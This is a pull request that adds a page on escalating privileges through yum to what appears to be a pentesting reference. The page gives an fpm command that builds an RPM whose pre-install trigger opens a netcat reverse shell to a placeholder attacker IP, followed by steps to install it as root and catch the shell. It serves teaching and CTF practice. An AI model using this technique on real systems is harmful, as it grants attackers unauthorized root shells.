### PR TITLE
Adds an exploiting-yum page

### DIFF
--- a/linux-unix/privilege-escalation/exploiting-yum.md
+++ b/linux-unix/privilege-escalation/exploiting-yum.md
@@ -1,0 +1,29 @@
+# Exploiting Yum
+Further examples around yum can also be found on [gtfobins](https://gtfobins.github.io/gtfobins/yum/).
+
+## Executing arbitrary commands via RPM Packages
+### Checking the Environment
+In order to leverage this vector the user must be able to execute yum commands as a higher privileged user, i.e. root.
+
+#### A working example of this vector
+A working example of this exploit can be found in the [daily bugle](https://tryhackme.com/room/dailybugle) room on [tryhackme](https://tryhackme.com).
+
+### Packing an RPM
+In the following section, I will cover packaging a reverse shell into an RPM using [fpm](https://github.com/jordansissel/fpm).
+
+The example below creates a package that includes a before-install trigger with an arbitrary script that can be defined by the attacker. When installed, this package will execute the arbitrary command. I've used a simple reverse netcat shell example for demonstration but this can be changed as necessary.
+
+```text
+EXPLOITDIR=$(mktemp -d)
+CMD='nc -e /bin/bash <ATTACKER IP> <PORT>'
+RPMNAME="exploited"
+echo $CMD > $EXPLOITDIR/beforeinstall.sh
+fpm -n $RPMNAME -s dir -t rpm -a all --before-install $EXPLOITDIR/beforeinstall.sh $EXPLOITDIR
+```
+
+## Catching a shell
+Using the above example and assuming `yum` can be executed as a higher-privileged user.
+
+1. **Transfer** the rpm to the host
+2. **Start** a listener on your local host such as the [example netcat listener](/shells/shells/linux#netcat)
+3. **Install** the vulnerable package `yum localinstall -y exploited-1.0-1.noarch.rpm`


### PR DESCRIPTION
This PR adds a brief example of using [fpm](https://github.com/jordansissel/fpm) and the `before-install` rpm trigger to execute arbitrary commands via a package install. This does include a link to a THM room where this example exploit can be tested. Please let me know if it's better to remove this, in case of spoilers.

Thanks again for the great reference book,